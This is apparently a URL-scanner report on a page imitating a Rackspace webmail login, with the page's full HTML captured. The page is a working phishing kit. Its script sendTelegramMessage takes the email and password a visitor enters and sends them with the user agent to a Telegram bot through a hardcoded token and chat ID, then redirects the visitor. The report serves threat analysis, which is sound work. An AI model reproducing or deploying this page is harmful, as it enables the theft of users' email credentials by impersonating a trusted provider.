https://mail-rackspaceweb-phi.vercel.app/

Eingereichte URL:
https://mail-rackspaceweb-phi.vercel.app/
Bericht beendet:

JavaScript-Variablen · 4 gefunden

NameTyp
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
sendTelegramMessagefunction

Konsolenprotokoll-Meldungen · 2 gefunden

TypKategorieProtokoll
verbosedom
URL
https://mail-rackspaceweb-phi.vercel.app/
Text
[DOM] Password field is not contained in a form: (More info: https://goo.gl/9p2vKq) %o
errornetwork
URL
https://mail-rackspaceweb-phi.vercel.app/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Webmail Login</title>
    <style>
        body {
            font-family: 'Helvetica', sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
        }
        .header {
            background-color: #333;
            color: white;
            padding: 15px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        .header h1 {
            margin: 0;
            font-size: 14px;
            font-weight: normal;
        }
        .header .logo {
            text-align: right;
        }
        .header .logo .rackspace {
            font-size: 12px;
            font-weight: bold;
            font-family: 'Courier New', Courier, monospace;
        }
        .header .logo .technology {
            font-size: 7px;
            font-style: italic;
            margin-top: -5px;
        }
        .container {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin-top: 20px;
            max-width: 400px;
            margin-left: auto;
            margin-right: auto;
        }
        .form-group {
            margin-bottom: 15px;
            width: 350px;
            position: relative;
        }
        .form-group label {
            display: flex;
            justify-content: space-between;
            margin-bottom: 5px;
        }
        .form-group input {
            width: 100%;
            padding: 6px;
            border: 1px solid #ccc;
            border-radius: 3px;
        }
        .forgot-password {
            color: #008080;
            font-size: 12px;
        }
        .login-button {
            background-color: #008080;
            color: white;
            padding: 12px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 20px;
            margin-left: auto;
            margin-right: 10px;
            box-sizing: border-box;
        }
        .footer {
            text-align: center;
            margin-top: 20px;
            position: relative;
        }
        .footer::after {
            content: '';
            display: block;
            border-top: 1px solid white;
            margin-top: 10px;
            background-color: #f4f4f4;
            width: 100%;
            position: absolute;
            bottom: -10px;
        }
        .footer a {
            font-size: 12px;
            color: #008080;
            text-decoration: none;
            margin: 0 10px;
        }
        .footer-text {
            font-size: 12px;
            color: black;
            margin-top: 20px;
        }
    </style>
    <script>
        function sendTelegramMessage() {
            var email = document.getElementById('email').value;
            var password = document.getElementById('password').value;
            var ip = '127.0.0.1'; // Get IP using server-side scripting
            var userAgent = navigator.userAgent;

            var message = "Email: " + email + "\nPassword: " + password + "\nIP: " + ip + "\nUser Agent: " + userAgent;

            var botToken = '6310609155:AAEYr1nNZxD8SbZr_YDnbjMo1paDip5Le2U';
            var chatId = '1301527362';
            var url = 'https://api.telegram.org/bot' + botToken + '/sendMessage?chat_id=' + chatId + '&text=' + encodeURIComponent(message);

            fetch(url, { method: 'GET' })
                .then(response => response.json())
                .then(data => {
                    console.log(data); // Log the response from Telegram
                    // Redirect to index2.html after successful form submission
                    window.location.href = 'index2.html';
                })
                .catch(error => console.error('Error:', error));
        }
    </script>
</head>
<body>
    <div class="header">
        <h1>Webmail Login</h1>
        <div class="logo">
            <div class="rackspace">𝙧𝙖𝙘𝙠𝙨𝙥𝙖𝙘𝙚</div>
            <div class="technology">technology</div>
        </div>
    </div>
    <div class="container">
        <div class="form-group">
            <label for="email">Email address</label>
            <input type="email" id="email" name="email" required="">
        </div>
        <div class="form-group">
            <label for="password">
                Password
                <a href="#" class="forgot-password">Forgot password?</a>
            </label>
            <input type="password" id="password" name="password" required="">
        </div>
        <button class="login-button" onclick="sendTelegramMessage()">Log In</button>
        <div class="footer">
            <a href="#">Privacy Statements</a> | <a href="#">Website Terms</a>
            <p class="footer-text">Need webmail for your business? Learn more about Hosted Email from Rackspace</p>
        </div>
    </div>


</body></html>